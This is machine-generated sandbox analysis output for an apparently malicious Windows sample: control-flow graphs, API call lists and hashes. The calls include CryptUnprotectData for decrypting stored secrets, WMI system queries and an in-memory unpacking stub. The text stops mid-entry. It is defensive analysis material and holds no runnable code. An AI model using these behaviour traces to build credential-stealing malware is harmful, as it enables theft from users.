                                                                                                control_flow_graph 0 437df0-437e0f 1 437e10-437e24 0->1 1->1 2 437e26-437e34 1->2 3 437e40-437e54 2->3 3->3 4 437e56-437e97 3->4 5 437ea0-437ec5 4->5 5->5 6 437ec7-437ede 5->6 8 437f92-437f9f 6->8 9 437ee4-437eef 6->9 11 437fa0-437fe0 8->11 10 437ef0-437f22 9->10 10->10 12 437f24-437f37 10->12 11->11 13 437fe2-43803c CoCreateInstance 11->13 14 437f40-437f82 12->14 15 438042-43807b 13->15 16 438440-43846f call 43dbf0 GetVolumeInformationW 13->16 14->14 18 437f84-437f8e 14->18 19 438080-4380bc 15->19 22 438471-438475 16->22 23 438479-43847b 16->23 18->8 19->19 20 4380be-4380e9 SysAllocString 19->20 26 43842f-43843c SysFreeString 20->26 27 4380ef-438109 CoSetProxyBlanket 20->27 22->23 25 43848d-438494 23->25 28 4384a0-4384b6 25->28 29 438496-43849d 25->29 26->16 30 438425-43842b 27->30 31 43810f-438121 27->31 32 4384c0-4384f0 28->32 29->28 30->26 34 438130-438177 31->34 32->32 33 4384f2-43852b 32->33 35 438530-438573 33->35 34->34 36 438179-4381f2 SysAllocString 34->36 35->35 37 438575-4385a5 call 41e5c0 35->37 38 438200-438235 36->38 42 4385b0-4385b8 37->42 38->38 40 438237-438261 SysAllocString 38->40 45 438413-438423 SysFreeString * 2 40->45 46 438267-438289 40->46 42->42 44 4385ba-4385bc 42->44 47 4385c2-4385d2 call 4081b0 44->47 48 438480-438487 44->48 45->30 53 438409-43840f 46->53 54 43828f-438292 46->54 47->48 48->25 50 4385d7-4385de 48->50 53->45 54->53 55 438298-43829d 54->55 55->53 56 4382a3-4382ef VariantInit 55->56 57 4382f0-438319 56->57 57->57 58 43831b-43832d 57->58 59 438331-438333 58->59 60 438339-43833f 59->60 61 4383f8-438405 VariantClear 59->61 60->61 62 438345-438353 60->62 61->53 63 438355-43835a 62->63 64 43838d 62->64 66 43836c-438370 63->66 65 43838f-4383b7 call 408020 call 408d50 64->65 77 4383b9 65->77 78 4383be-4383ca 65->78 68 438372-43837b 66->68 69 438360 66->69 72 438382-438386 68->72 73 43837d-438380 68->73 71 438361-43836a 69->71 71->65 71->66 72->71 75 438388-43838b 72->75 73->71 75->71 77->78 79 4383d1-4383f4 call 408050 call 408030 78->79 80 4383cc 78->80 79->61 80->79
                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
                                                                                                • SysAllocString.OLEAUT32()\"^), ref: 004380C3
                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
                                                                                                • SysAllocString.OLEAUT32()\"^), ref: 0043817E
                                                                                                • SysAllocString.OLEAUT32()\"^), ref: 00438238
                                                                                                • VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
                                                                                                • VariantClear.OLEAUT32(?), ref: 004383F9
                                                                                                • SysFreeString.OLEAUT32(?), ref: 0043841D
                                                                                                • SysFreeString.OLEAUT32(?), ref: 00438423
                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00438430
                                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,66966446,00000000,00000000,00000000,00000000), ref: 00438468
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                • String ID: P%R$)\"^$.H4J$O@$pq
                                                                                                • API String ID: 2573436264-1397720406
                                                                                                • Opcode ID: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
                                                                                                • Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
                                                                                                • Opcode Fuzzy Hash: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
                                                                                                • Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 85 415799-4157cc call 408030 call 43e6e0 90 415850 85->90 91 4157d3-4157f3 call 408020 call 43e7d0 85->91 92 415852-415869 85->92 93 415842-415847 85->93 94 415807 85->94 95 415839-41583f call 408030 85->95 96 415818-41582c call 401000 85->96 90->92 109 4157f8-415800 91->109 100 415870-4158cb 92->100 93->90 94->96 95->93 96->95 100->100 104 4158cd-4158d5 100->104 106 4158d7-4158e6 104->106 107 41591a-41597b call 401a90 104->107 110 4158f0-4158f7 106->110 116 415980-4159b4 107->116 109->90 109->92 109->93 109->94 109->95 109->96 111 415900-415906 110->111 112 4158f9-4158fc 110->112 111->107 115 415908-415917 call 43c1f0 111->115 112->110 114 4158fe 112->114 114->107 115->107 116->116 118 4159b6-4159d3 call 401dd0 116->118 122 415d60 118->122 123 415bc6-415bcb 118->123 124 415d46-415d5f call 43dbf0 118->124 125 415d66 118->125 126 415d7a-415ddf 118->126 127 4159da-4159df 118->127 128 415d3d-415d43 call 408030 118->128 129 415d6c-415d78 call 408030 118->129 133 415bd0-415bd9 123->133 124->122 134 415de0-415dfa 126->134 135 4159e0-4159e6 127->135 128->124 129->126 133->133 139 415bdb-415be2 133->139 134->134 140 415dfc-415e16 call 401dd0 134->140 135->135 141 4159e8-415a07 135->141 144 415be4-415be9 139->144 145 415c06 139->145 140->122 140->123 140->124 140->125 140->126 140->128 140->129 142 415a09-415a0c 141->142 143 415a0e 141->143 142->143 149 415a0f-415a28 142->149 143->149 147 415c09-415c4b call 408020 144->147 145->147 156 415c50-415cb6 147->156 152 415a2a-415a2d 149->152 153 415a2f 149->153 152->153 155 415a30-415a4e call 408020 152->155 153->155 162 415a54-415a5b 155->162 163 415b59-415bbf call 43dbf0 CryptUnprotectData 155->163 156->156 158 415cb8-415cc7 156->158 160 415ce1-415cf8 158->160 161 415cc9-415ccf 158->161 165 415d21-415d37 call 408cb0 160->165 166 415cfa-415d01 160->166 164 415cd0-415cdf 161->164 167 415a80-415aca call 41dae0 * 2 162->167 163->122 163->123 163->124 163->125 163->126 163->128 163->129 164->160 164->164 165->128 169 415d10-415d1f 166->169 177 415a70-415a7a 167->177 178 415acc-415ae7 call 41dae0 167->178 169->165 169->169 177->163 177->167 178->177 181 415ae9-415b11 178->181 182 415a61-415a65 181->182 183 415b17-415b2d call 41dae0 181->183 182->177 186 415b33-415b54 183->186 187 415a5d 183->187 186->177 187->182
                                                                                                APIs
                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415BAF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID: CryptDataUnprotect
                                                                                                • String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
                                                                                                • API String ID: 834300711-3328159043
                                                                                                • Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                                                                • Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
                                                                                                • Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                                                                • Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 273 409580-40958e 274 409aa4 273->274 275 409594-4095ff call 405ee0 call 408020 273->275 276 409aa6-409ab2 274->276 281 409600-409636 275->281 281->281 282 409638-40965f call 408f50 281->282 285 409660-4096af 282->285 285->285 286 4096b1-4096e3 call 408f50 285->286 289 4096f0-40975c 286->289 289->289 290 40975e-409794 call 408f50 289->290 293 4097a0-4097b0 290->293 293->293 294 4097b2-4097bf 293->294 295 4097c0-4097d4 294->295 295->295 296 4097d6-4097f6 call 408f50 295->296 299 409800-40985c 296->299 299->299 300 40985e-409932 call 4091b0 299->300 303 409940-409968 300->303 303->303 304 40996a-409972 303->304 305 409992-40999e 304->305 306 409974-40997f 304->306 308 4099a0-4099a3 305->308 309 4099c2-4099f2 305->309 307 409980-409990 306->307 307->305 307->307 311 4099b0-4099c0 308->311 310 409a00-409a5a 309->310 310->310 312 409a5c-409a78 call 40bbd0 310->312 311->309 311->311 314 409a7d-409aa2 call 408030 312->314 314->276
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #4<7$+8=>$8D18AE3C672E6F10AC8923850305D13E$PK$Tiec$\$r
                                                                                                • API String ID: 0-3722211771
                                                                                                • Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                                • Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
                                                                                                • Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                                • Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 321 408850-408861 call 43bc60 324 408867-40888f call 408020 321->324 325 408acf-408ad1 ExitProcess 321->325 328 408890-4088cb 324->328 329 408904-408916 call 4354e0 328->329 330 4088cd-408902 328->330 333 408ab8-408abf 329->333 334 40891c-40893f GetCurrentProcessId GetCurrentThreadId 329->334 330->328 335 408ac1-408ac7 call 408030 333->335 336 408aca call 43c160 333->336 337 408941-408943 334->337 338 408945-408a3b SHGetSpecialFolderPathW GetForegroundWindow 334->338 335->336 336->325 337->338 341 408a6b-408aac call 409b00 338->341 342 408a3d-408a69 338->342 341->333 346 408aae call 40c550 341->346 342->341 348 408ab3 call 40b390 346->348 348->333
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040891C
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00408925
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
                                                                                                • GetForegroundWindow.USER32 ref: 00408A33
                                                                                                  • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                                                  • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
                                                                                                  • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
                                                                                                • ExitProcess.KERNEL32 ref: 00408AD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3072701918-0
                                                                                                • Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                                • Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
                                                                                                • Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                                • Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,+*)
                                                                                                • API String ID: 0-3529585375
                                                                                                • Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                                                • Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
                                                                                                • Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                                                • Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                                                                • Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
                                                                                                • Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                                                                • Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 188 97003c-970047 189 97004c-970263 call 970a3f call 970e0f call 970d90 VirtualAlloc 188->189 190 970049 188->190 205 970265-970289 call 970a69 189->205 206 97028b-970292 189->206 190->189 211 9702ce-9703c2 VirtualProtect call 970cce call 970ce7 205->211 208 9702a1-9702b0 206->208 210 9702b2-9702cc 208->210 208->211 210->208 217 9703d1-9703e0 211->217 218 9703e2-970437 call 970ce7 217->218 219 970439-9704b8 VirtualFree 217->219 218->217 220 9705f4-9705fe 219->220 221 9704be-9704cd 219->221 224 970604-97060d 220->224 225 97077f-970789 220->225 223 9704d3-9704dd 221->223 223->220 228 9704e3-970505 223->228 224->225 231 970613-970637 224->231 229 9707a6-9707b0 225->229 230 97078b-9707a3 225->230 239 970517-970520 228->239 240 970507-970515 228->240 232 9707b6-9707cb 229->232 233 97086e-9708be LoadLibraryA 229->233 230->229 234 97063e-970648 231->234 236 9707d2-9707d5 232->236 238 9708c7-9708f9 233->238 234->225 237 97064e-97065a 234->237 241 9707d7-9707e0 236->241 242 970824-970833 236->242 237->225 243 970660-97066a 237->243 244 970902-97091d 238->244 245 9708fb-970901 238->245 246 970526-970547 239->246 240->246 247 9707e4-970822 241->247 248 9707e2 241->248 250 970839-97083c 242->250 249 97067a-970689 243->249 245->244 251 97054d-970550 246->251 247->236 248->242 252 970750-97077a 249->252 253 97068f-9706b2 249->253 250->233 254 97083e-970847 250->254 256 970556-97056b 251->256 257 9705e0-9705ef 251->257 252->234 258 9706b4-9706ed 253->258 259 9706ef-9706fc 253->259 260 97084b-97086c 254->260 261 970849 254->261 264 97056f-97057a 256->264 265 97056d 256->265 257->223 258->259 262 9706fe-970748 259->262 263 97074b 259->263 260->250 261->233 262->263 263->249 268 97057c-970599 264->268 269 97059b-9705bb 264->269 265->257 272 9705bd-9705db 268->272 269->272 272->251
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0097024D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID: cess$kernel32.dll
                                                                                                • API String ID: 4275171209-1230238691
                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                • Instruction ID: c29fec39ee57a83d17bac452df4c229d9a0e11f44a1bfaf8c6ba5dc7d6309009
                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                • Instruction Fuzzy Hash: B9526875A00229DFDB64CF68C985BA8BBB1BF49304F1480D9E94DAB351DB30AE85DF14

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 485 a5172e-a51747 486 a51749-a5174b 485->486 487 a51752-a5175e CreateToolhelp32Snapshot 486->487 488 a5174d 486->488 489 a51760-a51766 487->489 490 a5176e-a5177b Module32First 487->490 488->487 489->490 496 a51768-a5176c 489->496 491 a51784-a5178c 490->491 492 a5177d-a5177e call a513ed 490->492 497 a51783 492->497 496->486 496->490 497->491
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A51756
                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 00A51776
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818342942.0000000000A50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_a50000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 3833638111-0
                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction ID: e00ae9c1b21c4c89d63ced3a06d93ca4e08ba425ad809ea4f206d2f949670611
                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction Fuzzy Hash: 71F06235600710BBD7202BF9998DBBE76ECBF4D726F500628EA52914C0DAB0EC494A61

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 498 970e0f-970e24 SetErrorMode * 2 499 970e26 498->499 500 970e2b-970e2c 498->500 499->500
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000400,?,?,00970223,?,?), ref: 00970E19
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,00970223,?,?), ref: 00970E1E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                • Instruction ID: 727fe679e50d8e356a00f4c692adc69221b0a20b8b0b0ea56d2711bf74fe92b4
                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                • Instruction Fuzzy Hash: 84D01232245228B7DB002A94DC09BCEBB1CDF09BA2F008421FB0DE9080CBB09A4046EA

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 550 43c2c8-43c2d6 551 43c2e0-43c2fd 550->551 551->551 552 43c2ff-43ccb9 GetForegroundWindow call 43e110 551->552 555 43ccbe-43ccdf 552->555
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 0043CCAF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ForegroundWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2020703349-0
                                                                                                • Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                • Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
                                                                                                • Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                • Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 556 40c550-40c580 CoInitializeEx
                                                                                                APIs
                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0
                                                                                                • Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                • Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
                                                                                                • Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                • Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 557 40c583-40c5b2 CoInitializeSecurity
                                                                                                APIs
                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeSecurity
                                                                                                • String ID:
                                                                                                • API String ID: 640775948-0
                                                                                                • Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                                                • Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
                                                                                                • Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                                                • Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                                • Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
                                                                                                • Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                                • Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                                                                • Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
                                                                                                • Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                                                                • Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00A5143E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818342942.0000000000A50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_a50000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction ID: f46b7cbe7da1d68e8e59bcbba79b47f0415e30de43beb7bd7ebc94093f658034
                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction Fuzzy Hash: 63112B79A00208EFDB01DF98CA85E99BBF5AF08351F158094F9489B362D371EA50DF80
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
